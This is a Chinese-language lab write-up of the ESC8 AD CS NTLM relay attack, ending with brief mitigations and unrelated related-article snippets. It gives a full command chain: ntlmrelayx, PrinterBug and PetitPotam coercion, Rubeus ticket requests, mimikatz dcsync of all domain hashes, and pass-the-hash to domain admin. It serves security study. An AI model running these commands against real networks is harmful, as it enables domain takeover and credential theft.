【ADCS系列】ESC8 ADCS Relay

本文涉及的产品
.cn 域名,1个 12个月
简介: 由于ADCS的http证书接口没有启用NTLM中继保护,因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此Kerberos协议无法使用。因此,攻击者可以利用NTLM Relay攻击ADCS证书服务

一、ADCS  Relay漏洞简介:

由于ADCS的http证书接口没有启用NTLM中继保护,因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此Kerberos协议无法使用。因此,攻击者可以利用NTLM Relay攻击ADCS证书服务





二、实验环境:

继上一篇文章所搭建的环境进行复现->

环境搭建篇

win2012 R2(域控)ip:192.168.136.100

win2012 R2(额外域控)ip:192.168.136.120(ADCS证书服务器)

win2008 R2(域内机器)ip:192.168.136.80

kali(攻击机):192.168.136.144




三、复现过程:

win 2008 R2作为域内普通用户权限机器,注入票据、pth等操作都在此完成,以接近实际环境



1、定位ADCS证书服务器:


certutil -config - -ping



证书服务器web页面:


http://证书服务器域名/certsrv/certfnsh.asp




要更新为这个版本的impacket,具体用git pull 更新下,然后执行setup.py安装一遍就行了:

https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack




首先使用ntlmrelay.py开启监听:


python3 ntlmrelayx.py -t http://192.168.136.120/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'


PS:需要将默认的http服务先关掉,否则会报错:address is already in use:



①使用打印机服务printerbug触发:


python3 printerbug.py 域名/域用户账号:域用户密码@域控ip 开启ntlmrelay监听的攻击机ip



②使用Petitpotam,利用FSRPC协议强连触发:


python3 Petitpotam.py -u 域用户账号 -p 域用户密码 -d 域名 开启ntlmrelay监听的攻击机ip 域控ip



然后ntlmrelay就会成功relay到base64编码的证书:



然后利用Rubeus.exe导入证书数据,获取tgt并注入:


Rubeus.exe asktgt /user:证书的user$ /certificate:base64编码的证书内容 /ppt



执行结果,成功获取到了TGT:



可以使用mimikatz导出krbtgt用户的hash:


kerberos::list       #查看kerberos票据




lsadump::dcsync /user:krbtgt /csv       #导出krbtgt用户的hash



以及可以dcsync导出域内所有hash:


lsadump::dcsync /all


或者手动注入票据,使用kekeo,然后再配合impacket利用:



获取到hash后可以进行pth到主域控:



wmiexec.exe -hashes :NTLMHash值 域名/用户名@目标IP可以看到ip信息为主域控ip,权限为域管




三、防御措施:

1、如果不需要,可以关闭证书服务的web端点。

2、可以将certsrv,该iis配置中的ntlm认证删除,这样就无法使用ntlm进行认证,也就阻止了relay攻击




目录
相关文章
|
域名解析 弹性计算 Linux
|
SQL 存储 关系型数据库
再深入一点|binlog和relay-log到底长啥样?
上一篇mysql面试的文章之后收到不少朋友的意见,希望深入讲讲复制、日志的格式这些,今天,我们就来深挖一下mysql的复制机制到底有哪一些,以及binlog和relay-log的结构到底是什么样子的。
再深入一点|binlog和relay-log到底长啥样?
|
Linux 前端开发
esc服务器
第一次使用阿里云的esc服务器,真是方便,简单,容易上手,节省时间,稍微了解一下操作就可以直接上手,还有成长路线,成长课程,真的是爱了爱了。
313 0
esc服务器
|
数据采集 应用服务中间件 Linux
通过ESC我学到了什么
学会了很多东西,搭建了博客,有了自己的图床,用ftp做了一个网盘,还把爬虫放到服务器上运行,很感谢阿里云为学生免费提供的云服务器,就是这个1M的带宽 实在是有点少,不过还是很友善了.😀
|
弹性计算 运维 物联网
esc
一,第一部分 自我介绍 我是一名大二在读的学生,我所学的专业是'物联网应用技术',在这学期所学课程《云上运维及应用实践教程》中真正的了解到了阿里云服务器,其中了解到了“飞天加速计划·高校学生在家实践”的活动,这个是通过注册登录后,在做一些简单的答题,然后我们就可以领取到一台ECS服务器,之后我们可以在开发社区中自学相应的网站开发的基础。 二,第二部分 下面是一些阿里云ECS的使用攻略 我是通过老师的指导进行操作的,在登陆后可以在搜索栏中找到ECS云服务器,在里面有很多概览,可以看到实例与镜像信息,点击查看这些课程学习可以使我们尽快的了解这个ECS云服务器该如何去使用,在这个概览功能中我对ECS
ESC服务器的使用
1.个人陈述 2.使用经验 3.收获
|
存储 弹性计算 Linux
Hello, ESC!
我是一名来自双非计算机非科班的大二学生,在身边同学的影响下了解到了Linux服务器的逼格,又通过B站了解到可以在阿里云购买服务器,因此在阿里云的飞天加速计划领取免费的服务器,试用时间为两周。领取前我在阿里云上完成了学生认证和新手预备训练营,并且学习使用了阿里云的镜像快照等功能。
|
弹性计算 C++
有关ESC使用
在课程学习期间接触ECS,在C++的学习方面提供了极大的便利。
97 1
|
弹性计算 前端开发 Linux
ESC使用后个人心得
1.为了开发自己的微信平台会用到后端数据库的搭建难免会用到云服务器,在朋友的推荐下选择“飞天加速计划•高校学生在家实践”活动,因此选择到了阿里云,为学生提供了一个非常好的开发环境,在搭建自己的后台中也渐渐的熟悉了。
ESC使用后个人心得
|
Ubuntu Linux 云计算
初识ESC
ESC的使用
217 1